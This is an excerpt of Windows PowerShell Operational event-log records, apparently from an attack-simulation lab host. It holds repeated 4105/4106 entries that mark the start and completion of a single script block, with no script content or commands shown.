Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474457
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474456
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474455
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474454
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474453
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474452
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474451
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474450
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474449
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474448
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474447
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474446
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474445
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474444
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474443
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474442
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474441
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474440
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474439
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474438
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474437
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474436
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474435
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474434
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474433
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474432
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474431
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474430
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474429
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474428
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474427
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474426
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474424
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474423
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474422
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474421
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474420
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474419
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474418
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474417
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474416
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474414
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474413
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474412
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474411
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474410
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474409
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474408
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474407
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474406
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474405
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474404
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474403
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
